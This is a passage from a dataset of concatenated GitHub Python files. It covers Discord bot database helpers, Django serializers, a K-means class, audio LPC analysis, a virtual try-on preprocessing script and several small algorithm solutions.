list(session.execute(stmt).all())\n output = ''\n for rank, row in enumerate(results):\n row_string = f'{rank+1}. **{row[0]}** - {row[1]}\\n'\n output = output + row_string\n return output\n\n\ndef people_increment(author):\n user_id = author.id\n user_name = author.name + '#' + author.discriminator\n _people_increment(user_id, user_name)\n\n\ndef _people_increment(user_id, name):\n person = session.query(People).filter(People.id == user_id).first()\n if (person):\n person.count += 1\n else:\n session.add(People(id=user_id, person_name=name, count=1))\n session.commit()\n\n### Reminders ###\ndef insert_reminder(user_id, reminder_time, channel_id, reminder_message):\n session.add(Reminder(\n discord_id=user_id, \n reminder_time=reminder_time, \n channel=channel_id, \n reminder_message=reminder_message))\n session.commit()\n\n\ndef query_reminders():\n current_time = time.time()\n due_reminders = session.query(\n Reminder.discord_id, \n Reminder.channel, \n Reminder.reminder_message) \\\n .filter(Reminder.reminder_time <= current_time) \\\n .filter(Reminder.status == 'pending').all()\n\n session.query(Reminder).filter(Reminder.status == 'pending').filter(Reminder.reminder_time <= current_time).delete()\n session.commit()\n return due_reminders\n\n\ndef query_user_reminders(user_id):\n reminders = session.query(Reminder.reminder_time, Reminder.reminder_message) \\\n .filter(Reminder.discord_id == user_id).all()\n return reminders\n\n\ndef clear_user_reminders(user_id):\n session.query(Reminder).filter(Reminder.discord_id == user_id).delete()\n session.commit()\n\n\n### Bait ###\ndef get_random_bait():\n bait = session.query(\n Bait.title,\n Bait.description,\n Bait.url,\n Bait.message) \\\n .order_by(func.random()).first()\n print(bait)\n return bait\n\n\ndef add_bait(title, description, url, message):\n session.add(Bait(title=title, description=description, url=url, message=message))\n session.commit()\n return 'Bait added!'\n\ndef clear_bait():\n session.query(Bait).delete()\n session.commit()\n return 'Bait cleared!'\n\n\n### Quotes ###\ndef add_quote(quote, author, guild_id=None):\n quote_already_exists = session.query(Quote.id, Quote.quote, Quote.author, Quote.guild_id).filter(Quote.quote == quote).first()\n if quote_already_exists:\n return 'ERROR: Quote already exists! \\n' + str(quote_already_exists)\n if guild_id:\n session.add(Quote(quote=quote, author=author, guild_id=guild_id))\n else:\n session.add(Quote(quote=quote, author=author))\n session.commit()\n return 'quote added! \\n' + str(session.query(Quote.id, Quote.quote, Quote.author, Quote.guild_id).filter(Quote.quote == quote).first())\n\ndef get_quote(id=None, guild_id=None):\n if id: \n quote = session.query(Quote.quote, Quote.author) \\\n .filter((Quote.guild_id == None) | (Quote.guild_id == guild_id)) \\\n .filter(Quote.id == id).first()\n else:\n quote = session.query(Quote.quote, Quote.author) \\\n .order_by(func.random()).first()\n return quote\n\n\n### Images ###\ndef add_image(url, guild_id=None):\n img_already_exists = session.query(Image.id, Image.url, Image.guild_id).filter(Image.url == url).first()\n if img_already_exists:\n return 'ERROR: Image already exists! \\n' + str(img_already_exists)\n if guild_id:\n session.add(Image(url=url, guild_id=guild_id))\n else:\n session.add(Image(url=url))\n session.commit()\n return 'Image added! 
\\n' + str(session.query(Image.id, Image.url, Image.guild_id).filter(Image.url == url).first())\n\ndef get_image(id=None, guild_id=None):\n    if id: \n        url = session.query(Image.url) \\\n            .filter((Image.guild_id == None) | (Image.guild_id == guild_id)) \\\n            .filter(Image.id == id).first()\n    else:\n        url = session.query(Image.url) \\\n            .filter((Image.guild_id == None) | (Image.guild_id == guild_id)) \\\n            .order_by(func.random()).first()\n    return url\n\ndef get_guild_image(guild_id):\n    url = session.query(Image.url) \\\n        .filter(Image.guild_id == guild_id) \\\n        .order_by(func.random()).first()\n    return url\n\n\ndef list_images(guild_id=None):\n    return session.query(Image.id, Image.url, Image.guild_id).filter(Image.guild_id == guild_id).all()","repo_name":"michaeldchin/shounentime","sub_path":"botmain/dbsetup.py","file_name":"dbsetup.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}{"seq_id":"17613137113","text":"from Products.ZenUtils.guid.interfaces import IGlobalIdentifier\nfrom Products.ZenUtils.guid.guid import GUIDManager\n\nfrom Products.ZenModel.NotificationSubscription import NotificationSubscriptionManager\n\nimport logging\nlog = logging.getLogger(\"zen.notificationdao\")\n\n\nclass NotificationDao(object):\n    def __init__(self, dmd):\n        self.dmd = dmd\n        self.notification_manager = self.dmd.getDmdRoot(NotificationSubscriptionManager.root)\n        self.guidManager = GUIDManager(dmd)\n\n    def getNotifications(self):\n        self.dmd._p_jar.sync()\n        return self.notification_manager.getChildNodes()\n\n    def getSignalNotifications(self, signal):\n        \"\"\"\n        Given a signal, find which notifications match this signal. In order to\n        match, a notification must be active (enabled and if has maintenance\n        windows, at least one must be active) and must be subscribed to the\n        signal.\n\n        @param signal: The signal for which to get subscribers.\n        @type signal: protobuf zep.Signal\n        \"\"\"\n        active_matching_notifications = []\n        for notification in self.getNotifications():\n            if notification.isActive():\n                if self.notificationSubscribesToSignal(notification, signal):\n                    active_matching_notifications.append(notification)\n                    log.debug('Found matching notification: %s', notification)\n                else:\n                    log.debug('Notification \"%s\" does not subscribe to this signal.', notification)\n            else:\n                log.debug('Notification \"%s\" is not active.', notification)\n\n        return active_matching_notifications\n\n    def notificationSubscribesToSignal(self, notification, signal):\n        \"\"\"\n        Determine if the notification matches the specified signal.\n\n        @param notification: The notification to check\n        @type notification: NotificationSubscription\n        @param signal: The signal to match.\n        @type signal: zenoss.protocols.protbufs.zep_pb2.Signal\n\n        @rtype boolean\n        \"\"\"\n        return signal.subscriber_uuid == IGlobalIdentifier(notification).getGUID()\n\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenEvents/NotificationDao.py","file_name":"NotificationDao.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}{"seq_id":"24195093546","text":"# CONSTANTS\nDAYS = (\"Saturday\", \"Sunday\", \"Monday\", \"Tuesday\",\n        \"Wednesday\", \"Thursday\", \"Friday\")\n\nMONTH_NAMES = (\"January\", \"February\", \"March\", \"April\", \"May\", \"June\",\n               \"July\", \"August\", \"September\", \"October\", \"November\", \"December\")\n\nMONTH_CODES = (1, 4, 4, 0, 2, 5, 0, 3, 6, 1, 4, 
6)\nYEAR_CODES = (6, 4, 2, 0)\n\n\n# DAY FINDER FUNCTION\ndef getDay(date, month, year):\n leapYear = 0\n maxDate = 31\n\n # We'll subtract by 1, when the leap year comes in the month of Jan and Feb\n if year % 4 == 0 and (month in [1, 2]):\n leapYear = -1\n\n # Correcting the date and month if it exceeds or preceeds the normal range\n if (date > maxDate): date = maxDate\n elif (date < 1): date = 1\n\n if (month > 12): month = 12\n elif (month < 1): month = 1\n\n\n '''\n If it is month of February (2) and the year is a leap year, then the\n Maximum Date in Feb = 29 else Maximum Date in Feb = 28\n \n In the elif part,\n For the month of April (4), June (6), September (9), November (11) have 30 days.\n Assigning maxDate = 30\n\n And the syntax,\n >>> month in [4, 6, 9, 11]\n\n The 'in' keyword checks, if the value on the left is inside the list of [4, 6, 7, 11]. It returns True or False.\n\n It is similar to the switch statement in other Programming languages like C, C++, JavaScript, etc... but lot easier syntax\n '''\n\n if month == 2:\n maxDate = 29 if year % 4 == 0 else 28\n elif month in [4, 6, 9, 11]:\n maxDate = 30\n\n \n # Getting the code number from the respective Codes of list\n monthCode = MONTH_CODES[month - 1]\n yearCode = YEAR_CODES[(year//100) % 4]\n\n # Based on the formula of finding the day in maths\n total = date + monthCode + year % 100 + \\\n yearCode + (year//4) % 100 + leapYear\n\n # Returning the name of the day\n return DAYS[total % 7]\n\n\nprint(getDay(10, 7, 2021))\nprint(getDay(25, 12, 2020))\nprint(getDay(1, 1, 2020))\nprint(getDay(1, 1, 2021))\n\n'''\nOUTPUT:\n Saturday\n Friday\n Wednesday\n Friday\n'''\n","repo_name":"HighSchoolCoders/Python","sub_path":"Day Finder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4597779180","text":"import datetime\n\nfrom django.contrib.auth.models import User\n\nfrom rest_framework import serializers\n\nfrom lists.models import List, Item\n\n\nclass UserSerializer(serializers.ModelSerializer):\n \n # add username custom field, to avoid already exists users erros.\n username = serializers.CharField()\n \n class Meta:\n model = User\n fields = ('username',)\n\n\nclass ItemSerializer(serializers.HyperlinkedModelSerializer):\n\n pk = serializers.IntegerField(read_only=True)\n\n # use serializer to users\n # required false to permited anonymous users?\n assigned_to = UserSerializer(required=False)\n created_by = UserSerializer(required=False) \n\n class Meta:\n model = Item\n fields = (\n 'url',\n 'pk',\n 'title',\n 'priority',\n 'assigned_to',\n 'created_by',\n 'completed',\n 'completed_date'\n )\n # explicity custom view_name and lookup_field\n extra_kwargs = {\n 'url': {'view_name': 'task_detail', 'lookup_field': 'pk'}\n }\n\n\nclass TodoListSerializer(serializers.HyperlinkedModelSerializer):\n\n pk = serializers.IntegerField(read_only=True)\n\n # use serializer to taks\n tasks = ItemSerializer(many=True)\n\n class Meta:\n model = List\n fields = ('url', 'pk', 'title', 'tasks')\n # explicity custom view_name and lookup_field\n extra_kwargs = {\n 'url': {'view_name': 'list_detail', 'lookup_field': 'pk'}\n }\n\n def create(self, validated_data):\n # get tasks on validated_data\n # and create todo_list with validade_data\n tasks_data = validated_data.pop('tasks')\n todo_list = List.objects.create(**validated_data)\n\n for t_data in tasks_data:\n # get assigned_to and created_by from t_data\n # than 
            # then get or create the user by username\n            assigned_data = t_data.pop('assigned_to')\n            assigned_to, created = User.objects.get_or_create(username=assigned_data[\"username\"])\n            created_data = t_data.pop('created_by')\n            created_by, created = User.objects.get_or_create(username=created_data[\"username\"])\n            # and now create Item (task)\n            Item.objects.create(\n                todo_list=todo_list,\n                assigned_to=assigned_to,\n                created_by=created_by,\n                **t_data\n            )\n\n        return todo_list\n\n    def update(self, instance, validated_data):\n        # get tasks from validated_data\n        tasks_data = validated_data.pop('tasks')\n        # mapping\n        tasks_mapping = {item['pk']: item for item in tasks_data}\n\n        # update the list instance\n        instance.title = validated_data['title']\n        instance.save()\n\n        # creations and updates\n        for task_id, data in tasks_mapping.items():\n            # get assigned_to and created_by from data\n            # then get or create the user by username\n            assigned_data = data.pop('assigned_to')\n            assigned_to, created = User.objects.get_or_create(username=assigned_data[\"username\"])\n            created_data = data.pop('created_by')\n            created_by, created = User.objects.get_or_create(username=created_data[\"username\"])\n            # get or create an Item (task)\n            task, created = Item.objects.get_or_create(id=task_id, todo_list=instance)\n            # and apply any changes; don't forget save()\n            task.priority = data.get('priority', task.priority)\n            task.assigned_to = assigned_to\n            task.created_by = created_by\n            task.title = data.get('title', task.title)\n            task.save()\n\n        # Delete if necessary\n        # for task_id, task in tasks_mapping.items():\n        #     if task_id not in instance.tasks.all():\n        #         task.delete()\n\n        return instance","repo_name":"2bec/django-todo_46g","sub_path":"lists/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"6785470166","text":"\n\nclass ModelUtils:\n\n    @classmethod\n    def get_children(cls, queryset, label_key, model):\n        results = []\n        for obj in queryset:\n            result = {\n\t\t\t\t\"value\": obj.id,\n\t\t\t\t\"label\": getattr(obj, label_key),\n\t\t\t}\n            if model.objects.filter(parent=obj):\n                result[\"children\"] = cls.get_children(model.objects.filter(parent=obj), label_key, model)\n            results.append(result)\n        return results\n","repo_name":"wartemple/base-django","sub_path":"backend/common/utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23564563051","text":"#T = input()\r\nmy_file=open('Test.txt','r')\r\n#List = []\r\n#for i in range (0,int(T)):\r\n    #N = input()\r\n    ##Del=Word.split()\r\n    #List.append(N)\r\nList=my_file.readlines()\r\nmy_file.close()\r\n\r\nR=[]\r\ns=1\r\nfor i in List:\r\n    if int(i)<10:\r\n        R.append('Case'+' '+'#'+str(s)+':'+' '+i)\r\n        #print('Case'+' '+'#'+str(s)+':'+' '+i)\r\n    if int(i)>=10: #and int(i[0])!=1:\r\n        Y=i\r\n        Y=Y[1:len(i)+1]\r\n        X=int(i)-int(Y)-1\r\n        Word=X\r\n        for j in range (int(i),X-1,-1):\r\n            A=str(j)\r\n            p=0\r\n            for k in range(0,len(A)-1):\r\n                if int(A[k])<=int(A[k+1]):\r\n                    p=p+1\r\n            if p==len(A)-1:\r\n                Word=A\r\n                break\r\n        R.append('Case'+' '+'#'+str(s)+':'+' '+Word)\r\n        #print('Case'+' '+'#'+str(s)+':'+' '+Word)\r\n    s=s+1\r\n\r\nmy_file=open('Result.txt','w')\r\n\r\nfor i in R:\r\n    
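To illustrate the nested create() in the TodoListSerializer record above, here is a hypothetical payload shape it would accept (field names come from the serializer; the values are invented):

payload = {
    'title': 'Groceries',
    'tasks': [{
        'title': 'Buy milk',
        'priority': 1,
        'assigned_to': {'username': 'alice'},
        'created_by': {'username': 'bob'},
    }],
}
# serializer = TodoListSerializer(data=payload, context={'request': request})
# if serializer.is_valid(): serializer.save()   # routes through create()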
my_file.write(i+'\\n')\r\nmy_file.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/5436.py","file_name":"5436.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18879314609","text":"class NumArray(object):\n\n def __init__(self, nums):\n \"\"\"\n :type nums: List[int]\n \"\"\"\n\n self.list = []\n\n l = len(nums)\n\n sum = 0\n for i in range(0, l):\n sum += nums[i]\n self.list.append(sum)\n\n def sumRange(self, i, j):\n \"\"\"\n :type i: int\n :type j: int\n :rtype: int\n \"\"\"\n if i == 0:\n return self.list[j]\n else:\n return self.list[j] - self.list[i - 1]\n\n# Your NumArray object will be instantiated and called as such:\n# obj = NumArray(nums)\n# param_1 = obj.sumRange(i,j)","repo_name":"zhishu520/leetcode","sub_path":"303. Range Sum Query - Immutable.py","file_name":"303. Range Sum Query - Immutable.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38210402486","text":"import librosa as lbr\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport IPython.display as ipd\r\nx , fs = lbr.load('a.wav')\r\nsample = 8000\r\na = lbr.lpc(x,12)\r\nx_padding = np.pad(a,(12,8000),'constant')\r\nprint(len(x_padding))\r\ny = np.abs(np.fft.fft(x,sample))\r\nlpc = np.fft.fft(x_padding,sample)\r\nlpc_rep = np.abs(np.reciprocal(lpc))\r\nhalf = fs/2\r\nplt.plot(np.arange(4000)/4000*half,np.log(np.abs(y[:4000])),label='signal')\r\nplt.plot(np.arange(4000)/4000*half,np.log(np.abs(lpc_rep[:4000])),label='lpc spectrum')\r\nplt.xlabel('Frequency')\r\nplt.ylabel('log magnitude')\r\nplt.legend()\r\nplt.show()","repo_name":"Maliniravi23/Malini","sub_path":"LinearPredictionAnalysis.py","file_name":"LinearPredictionAnalysis.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27113791963","text":"\nfrom enable.tools.api import ViewportPanTool\nfrom traits.api import HasTraits, Instance, Str, List, Property, Dict\n\nfrom mapping.enable.api import MappingCanvas, MappingViewport, MBTileManager\n\n\nclass Model(HasTraits):\n\n canvas = Instance(MappingCanvas)\n viewport = Instance(MappingViewport)\n\n filename = Str\n\n\ndef main():\n manager = MBTileManager(filename = 'map.mbtiles',\n min_level = 0,\n max_level = 3)\n\n canvas = MappingCanvas(tile_cache = manager)\n\n viewport = MappingViewport(component=canvas)\n viewport.tools.append(ViewportPanTool(viewport))\n\n model = Model(canvas=canvas, viewport=viewport)\n\n import enaml\n with enaml.imports():\n from simple_view import Map\n window = Map(model=model)\n window.show()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nmichaud/enable-mapping","sub_path":"example/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"72331174593","text":"import os\nimport argparse\n\nparser = argparse.ArgumentParser(description = 'merge mupexi data')\nparser.add_argument('base_dir', type = str, help = 'directory to look for mupexi files')\nparser.add_argument('prefix', type = str, help = 'prefix for output files')\nargs = parser.parse_args()\n\nall_data = []\nbase_string = ''\nmissense = 0\ninsertions = 0\ndeletions = 0\nframeshift = 0\n# get data from all files with a mupexi 
extension\nfor directory in sorted([f\"{args.base_dir}/{dir_to_check}\" for dir_to_check in os.listdir(args.base_dir)]):\n if os.path.isdir(directory):\n found = False\n mupexi_file = ''\n for filenm in sorted(os.listdir(directory)):\n if (filenm[len(filenm) - 6:len(filenm)] == 'mupexi') and (os.path.isfile(directory + '/' + filenm)):\n found = True\n mupexi_file = filenm\n base_string = filenm\n break\n if found:\n with open(directory + '/' + mupexi_file) as data:\n all_data.append(data.readlines())\n mupexi_log = mupexi_file[:-len(\".mupexi\")] + \".log\"\n if os.path.isfile(directory + '/' + mupexi_log):\n with open(directory + '/' + mupexi_log) as data:\n all_lines = data.readlines()\n for i, line in enumerate(all_lines):\n if \"missense\" in line:\n missense += int(line.split()[1])\n insertions += int(all_lines[i+1].split()[0])\n deletions += int(all_lines[i+2].split()[0])\n frameshift += int(all_lines[i+3].split()[0])\n break\n else:\n print('Did not find mupexi log file in {:}'.format(directory))\n else:\n print('Did not find mupexi file in {:}'.format(directory))\n\n# write data to one file\nwith open(f\"{args.base_dir}/{args.prefix}_merged.mupexi\", 'w') as data:\n for i, file_data in enumerate(all_data):\n if i == 0:\n data.write(''.join(file_data))\n else:\n # find the length of the header\n header_len = 0\n for line in file_data:\n if line[:len('HLA-')] == 'HLA-':\n break\n else:\n header_len += 1\n data.write(''.join(file_data[header_len:]))\n\nwith open(f\"{args.base_dir}/{args.prefix}_merged.log\", 'w') as data:\n data.write(\"missense {}\\n\".format(missense))\n data.write(\"insertions {}\\n\".format(insertions))\n data.write(\"deletions {}\\n\".format(deletions))\n data.write(\"frameshift {}\\n\".format(frameshift))\n","repo_name":"d-henness/bioinfo_workflows","sub_path":"scripts_dir/merge_mupexi_files.py","file_name":"merge_mupexi_files.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37455158023","text":"import json\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport mediapipe as mp\nimport os\n\n\n# running the preprocessing\n\ndef resize_img(path):\n im = Image.open(path)\n im = im.resize((768, 1024))\n im.save(path)\n\n\nfor path in os.listdir('/content/inputs/test/cloth/'):\n resize_img(f'/content/inputs/test/cloth/{path}')\n\nos.chdir('/content/virtual_clothes_try_on_assistant')\nos.system(\"rm -rf /content/inputs/test/cloth/.ipynb_checkpoints\")\nos.system(\"python cloth-mask.py\")\nos.chdir('/content')\nos.system(\n \"python3 /content/Self-Correction-Human-Parsing/simple_extractor.py --dataset 'lip' --model-restore '/content/Self-Correction-Human-Parsing/checkpoints/final.pth' --input-dir '/content/inputs/test/image' --output-dir '/content/inputs/test/image-parse'\")\nos.chdir('/content')\n\nmp_pose = mp.solutions.pose\npose = mp_pose.Pose(static_image_mode=True, min_detection_confidence=0.5)\ninput_image_dir = '/content/inputs/test/image/'\nmediapipe_json_dir = '/content/inputs/test/mediapipe_json/'\nmediapipe_img_dir = '/content/inputs/test/mediapipe_img/'\nopenpose_json_dir = '/content/inputs/test/openpose_json/'\nos.makedirs(openpose_json_dir, exist_ok=True)\nfor image_path in os.listdir(input_image_dir):\n image = cv2.imread(os.path.join(input_image_dir, image_path))\n image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results = pose.process(image_rgb)\n keypoints = results.pose_landmarks\n openpose_data = {\n \"version\": 1.0,\n \"people\": 
[]\n }\n if keypoints:\n person_data = {\n \"person_id\": 1,\n \"pose_keypoints_2d\": []\n }\n for landmark in keypoints.landmark:\n x = landmark.x\n y = landmark.y\n confidence = landmark.z # Use the z-coordinate as confidence\n person_data[\"pose_keypoints_2d\"].extend([x, y, confidence])\n openpose_data[\"people\"].append(person_data)\n json_filename = image_path.replace('.jpg', '.json')\n json_path = os.path.join(openpose_json_dir, json_filename)\n with open(json_path, 'w') as json_file:\n json.dump(openpose_data, json_file)\n annotated_image = image.copy()\n mp_drawing = mp.solutions.drawing_utils\n mp_drawing.draw_landmarks(annotated_image, keypoints, mp_pose.POSE_CONNECTIONS)\n img_path = os.path.join(mediapipe_img_dir, image_path.replace('.jpg', '_pose.jpg'))\n cv2.imwrite(img_path, annotated_image)\npose.close()\n\nfor image_path in os.listdir(input_image_dir):\n image = cv2.imread(os.path.join(input_image_dir, image_path))\n image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image_21_channels = np.zeros((image_rgb.shape[0], image_rgb.shape[1], 21))\n image_21_channels[:, :, :3] = image_rgb\n\nmodel_image = os.listdir('/content/inputs/test/image')\ncloth_image = os.listdir('/content/inputs/test/cloth')\n\npairs = zip(model_image, cloth_image)\n\nwith open('/content/inputs/test_pairs.txt', 'w') as file:\n for model, cloth in pairs:\n file.write(f\"{model} {cloth}\")\n\n# making predictions\nos.system(\n \"python /content/virtual_clothes_try_on_assistant/test.py --name output --dataset_dir /content/inputs --checkpoint_dir /content/virtual_clothes_try_on_assistant/checkpoints --save_dir /content/\")\n# os.system(\"rm -rf /content/inputs\")\nos.system(\"rm -rf /content/output/.ipynb_checkpoints\")","repo_name":"shirsneh/virtual_clothes_try_on_assistant","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24475512656","text":"import numpy as np\nclass KMean:\n def __init__(self):\n self.Location=None\n self.Data=None\n self.TotalData=None\n self.Attributes=None\n self.Lower=None\n self.Upper=None\n self.Centroid=None\n self.Cluster=None\n self.Similarity=0.0\n self.Dissimilarity=0.0\n self.TotalCluster=0\n def readData(self,Location,TotalCluster):\n self.TotalCluster=TotalCluster\n with open(Location,'r') as f:\n lines=f.read().split(\"\\n\")\n self.TotalData=int((lines[0].split(\",\"))[0])\n self.Attributes=int((lines[0].split(\",\"))[1])\n self.Data=np.zeros((self.TotalData,self.Attributes),dtype=float)\n for i in range(self.TotalData):\n row=lines[i+1].split(\",\")\n for j in range(self.Attributes):\n self.Data[i][j]=float(row[j])\n self.Lower=np.amin(self.Data,axis=0)\n self.Upper=np.amax(self.Data,axis=0)\n \n def manhattanDistance(self,v1,v2):\n return np.sum(abs(v1-v2)) \n \n def createCentroid(self):\n self.Centroid=np.zeros((self.TotalCluster,self.Attributes),dtype=float)\n for i in range(self.TotalCluster):\n self.Centroid[i]=(np.random.rand()*(self.Upper-self.Lower))+self.Lower\n \n def updateCentroid(self):\n for i in range(len(self.Cluster)):\n array=self.getIndexFromCluster(self.Cluster[i])\n for j in range(self.Attributes):\n tempSum=0.0\n for element in array:\n tempSum+=self.Data[element][j]\n self.Centroid[i][j]=tempSum/np.sum(self.Cluster[i])\n \n def getIndexFromCluster(self,array):\n return np.array([index for index in range(len(array)) if array[index]==1])\n \n def createCluster(self):\n #Cluster=TotalCluster*[[None]]\n 
self.Similarity=0.0\n        self.Dissimilarity=0.0\n        self.Cluster=np.zeros((self.TotalCluster,self.TotalData),dtype=int)\n        for i in range(self.TotalData):\n            min_distance=self.manhattanDistance(self.Data[i],self.Centroid[0])\n            max_distance=min_distance\n            index=0\n            for j in range(self.TotalCluster):\n                distance=self.manhattanDistance(self.Data[i],self.Centroid[j])\n                if distance<min_distance:\n                    min_distance=distance\n                    index=j\n                if distance>max_distance:\n                    max_distance=distance\n\n            self.Similarity+=min_distance\n            self.Dissimilarity+=max_distance\n            self.Cluster[index][i]=1\n    \n    def displayCluster(self):\n        i=0\n        for array in self.Cluster:\n            i+=1\n            print(\"\\nCluster {} \\tElements: {}\".format(i,np.sum(array)))\n            print([index for index in range(len(array)) if array[index]==1]) \n    \n    \n    def displayData(self):\n        print(\"\\n================Data============\\n\")\n        print(self.Data)\n    \n    def displayCentroid(self):\n        print(\"\\n================Centroids============\\n\")\n        print(self.Centroid)\n    \n    def manhattanDistance(self,v1,v2):\n        return np.sum(abs(v1-v2))\n    \n    def train(self,iterations,error_margin):\n        self.createCentroid()\n        self.createCluster()\n        self.displayData()\n        self.displayCentroid()\n        self.displayCluster()\n        temp_similarity=self.Similarity\n        print(\"\\nSimilarity: {}\\tDissimilarity: {}\".format(self.Similarity,self.Dissimilarity))\n        for i in range(iterations):\n            self.updateCentroid()\n            self.createCluster()\n            print(\"\\nSimilarity: {}\\tDissimilarity: {}\".format(self.Similarity,self.Dissimilarity))\n            if(temp_similarity-self.Similarity) baseAccuracy:\r\n    print(\"Tuning successful! Best accuracy: {} (improvement of {})\".format(tunedAccuracy, (tunedAccuracy-baseAccuracy)))\r\nelse:\r\n    print(\"Tuning returned no improvements. Best accuracy: {}\".format(baseAccuracy))\r\n\r\n#Retrain the tuned model using the entire original training dataset\r\nfinalModel = ensemble.RandomForestClassifier(n_estimators=800, min_samples_split=5, min_samples_leaf=1, max_features='sqrt', max_depth=90, bootstrap=False)\r\nfinalModel.fit(trainAtts_old, trainLabels_old)\r\n#Save the final model\r\nfilename = \"879282_finalModel.h5\"\r\nhkl.dump(finalModel, filename, mode='w')\r\nprint(\"Saved final model\")\r\n\r\n#Use saved model to predict classification results of test.csv\r\nload_hkl = hkl.load(filename)\r\nfinalPredictions = load_hkl.predict(testData)\r\n#Save predictions to CSV file\r\ndf = pd.DataFrame({'TypeOfDefects':finalPredictions})\r\ndf.index = df.index + 1 #Start CSV index from 1, not 0\r\ndf.to_csv('UP879282_Predictions.csv', index_label='IndexOfTestSample')\r\nprint(\"Saved predictions\")","repo_name":"samueloneill/steeldefects","sub_path":"Main_Script.py","file_name":"Main_Script.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23645736491","text":"#!/usr/local/bin/python2.7\n# -*- coding: utf-8 -*-\n\nimport sys\nimport math\n\ndef debug(a): sys.stderr.write(str(a) + '\\n')\ndef readarray(foo): return [foo(e) for e in raw_input().split()]\ndef readint(): return int(raw_input().strip())\n\ndebug = lambda x: None\n\ndef calc(A, B):\n    \"\"\"\n    n = n_0 n_1...n_l-1\n    -> m = n_k...n_l-1 n_0 n_1...n_k-1 (k = 1...l-1)\n\n    O(B * log(B))\n    \"\"\"\n    iA = int(A)\n    iB = int(B)\n\n    assert 1 <= iA <= iB\n\n    result = 0\n\n    for n in range(iA, iB):\n        strn = str(n)\n        ms = set()\n\n        for k in range(1, len(strn)):\n            strm = strn[k:] + strn[:k]\n            m = int(strm)\n            if n < m <= iB:\n                debug('{0} < {1}'.format(n, m))\n                ms.add(m)\n\n        result += len(ms)\n\n    return result\n\nT = 
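A minimal usage sketch for the KMean class above (the CSV path and training parameters are hypothetical; readData expects a 'rows,columns' header line followed by comma-separated numeric rows, as parsed in the record):

km = KMean()
km.readData('data.csv', TotalCluster=3)   # hypothetical input file
km.train(iterations=50, error_margin=1e-4)
km.displayCluster()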
readint()\nfor i in xrange(T):\n A, B = raw_input().split()\n print('Case #{0}: {1}'.format(i + 1, calc(A, B)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_97/486.py","file_name":"486.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25780310676","text":"# -*- coding: utf-8 -*\n\"\"\"import\"\"\"\nimport json\nimport unicodedata\nfrom collections import OrderedDict\nimport six\nfrom paddle.fluid.core_avx import PaddleTensor\nfrom senta.common.rule import MaxTruncation\nimport sys\nimport os\nimport paddle\nimport paddle.fluid as fluid\n\ntry:\n import pkg_resources\n get_module_res = lambda *res: pkg_resources.resource_stream(__name__,\n os.path.join(*res))\nexcept ImportError:\n get_module_res = lambda *res: open(os.path.normpath(os.path.join(\n os.getcwd(), os.path.dirname(__file__), *res)), 'rb')\n\nPY2 = sys.version_info[0] == 2\n\ndefault_encoding = sys.getfilesystemencoding()\n\nif PY2:\n text_type = unicode\n string_types = (str, unicode)\n\n iterkeys = lambda d: d.iterkeys()\n itervalues = lambda d: d.itervalues()\n iteritems = lambda d: d.iteritems()\n\nelse:\n text_type = str\n string_types = (str,)\n xrange = range\n\n iterkeys = lambda d: iter(d.keys())\n itervalues = lambda d: iter(d.values())\n iteritems = lambda d: iter(d.items())\n\ndef strdecode(sentence):\n \"\"\"\n string to unicode\n :param sentence: a string of utf-8 or gbk\n :return: input's unicode result\n \"\"\"\n if not isinstance(sentence, text_type):\n try:\n sentence = sentence.decode('utf-8')\n except UnicodeDecodeError:\n sentence = sentence.decode('gbk', 'ignore')\n return sentence\n\n\ndef check_cuda(use_cuda):\n \"\"\"\n check_cuda\n \"\"\"\n err = \\\n \"\\nYou can not set use_cuda = True in the model because you are using paddlepaddle-cpu.\\n \\\n Please: 1. Install paddlepaddle-gpu to run your models on GPU or 2. 
